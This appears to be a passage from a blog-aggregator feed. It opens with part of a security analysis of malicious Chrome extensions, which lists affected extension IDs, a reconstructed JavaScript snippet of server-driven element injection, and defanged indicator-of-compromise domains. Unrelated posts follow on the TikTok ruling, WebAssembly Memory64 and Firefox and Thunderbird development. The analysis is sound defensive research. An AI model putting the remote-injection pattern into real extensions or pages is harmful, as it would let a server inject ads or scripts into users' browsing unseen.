StoriesHub | 100,000 | angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader | 30,000 | baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster | 100,000 | bgbclojjlpkimdhhdhbmbgpkaenfmkoe
TikTok in USA | 20,000 | bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN | 100,000 | bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki | 4,000 | ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram | 20,000 | cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories | 10,000 | cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube | 40,000 | cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader | 200,000 | cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru | 500,000 | dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco | 10,000 | djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo | 100,000 | dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock | 400,000 | epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything | 2,000 | idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram | 30,000 | inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. | 3,000 | iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo | 2,000 | jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram | 20,000 | kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video | 591 | kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook | 3,000 | kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook | 90,000 | kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper | 40,000 | kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram | 100,000 | ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download | 3,000 | nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock | 800,000 | nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader | 20,000 | oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook | 10,000 | ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram | 10,000 | ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them have also devised their own mechanisms to execute remote code. I didn’t find more extensions using the same approaches, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension that essentially bundles an interpreter for its very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other part in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective servers. EasyNav also removes security headers. These extensions don’t bother with HTML injection, however; instead, their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions; it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script, however.
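The mechanism described above doesn’t need much code. Here is my reconstruction of the general idea (not the extension’s actual code; the configuration field names are made up):

// config is part of the "language list" downloaded from the server
if (new RegExp(config.pattern).test(location.href)) {
  // Create whatever element the server asked for, e.g. an advertising iframe
  const element = document.createElement(config.tag);
  for (const [name, value] of Object.entries(config.attributes || {}))
    element.setAttribute(name, value);
  document.documentElement.appendChild(element);

  // Nothing ever removes the element again, and with the tag set to "script"
  // this would execute arbitrary code in the page
}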

The affected extensions

Name | Weekly active users | Extension ID
Adblock for Youtube™ - Auto Skip ad | 8,000 | anceggghekdpfkjihcojnlijcocgmaoo
EasyNav | 30,000 | aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads | 100,000 | gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 | 400,000 | ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi
Translator | 100,000 | icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don MartiSupreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not get.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpos[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with who. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user to user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what’s going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. (Techbros don’t have masculine energy, they have kleptomaniac princess energy.) If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting American’s privacy.

Bonus links

TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

Spidermonkey Development BlogIs Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)
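For reference, once this module has been compiled to a binary (I’ll assume a file called example.wasm, a placeholder name), it can be instantiated and called from JavaScript like this:

const { instance } = await WebAssembly.instantiateStreaming(fetch("example.wasm"));

instance.exports.storeAt16(42);             // write 42 to address 16 of the module's memory
console.log(instance.exports.loadFrom16()); // 42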

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal[1].

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load[2]. You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load[3]:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 sextillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses[4].

Even a 48-bit memory is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

By reserving 4GB of memory for all 32-bit WebAssembly modules, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely[5].

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.

Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et. al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align. 

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

Don MartiHow this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox NightlyKey Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] added $$$, a console helper that retrieves elements from the document, including those in the Shadow DOM (#1899558)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can access this menu from the cog button in about:addons
    • The "Manage Extension Shortcuts" pane from about:addons. A series of keyboard shortcut mappings for an extension is displayed - one of which is mapped to the F19 key.

      You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys are still going to be invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This changes how stories are laid out (new modular layouts instead of the same medium cards, with some sections organized into categories)
    • Try it out yourself in Nightly by setting the following prefs to true
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has now been merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 tracks fixing an AttributeError hit by mach xpcshell-test as a side effect of the changes from Bug 1661935; until that fix lands, mach test is a short-term workaround for running xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the add-on file to the device using base64, which made it possible to enable installing extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which sometimes was set to 0 unexpectedly (#1931514). Prior to that, Julian added a small workaround to fallback on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it has been shipping for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits; the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain SVG favicons being wrongly picked, and thus having bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new –page-main-content-width design token which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla ThunderbirdThunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

Prior to the team taking their winter break, a cascade of deliverables passed the patch review process and landed in Daily. A healthy cadence of task completion saw a number of features reach users and lift the team’s spirits:

  • Copy to EWS from other protocol
  • Folder create
  • Enhanced logging
  • Local Storage
  • Save & manipulate Draft
  • Folder delete
  • Fix Edit Draft

Keep track of feature delivery here.

Account Hub

The overhauled Account Hub passed phase 1 QA review! A smaller team is handling phase 2 enhancements now that the initial milestone is complete. Our current milestone includes tasks for density and font awareness, refactoring of state management, OAuth prompts and more, which you can follow via Meta bug & progress tracking.

Global Database & Conversation View

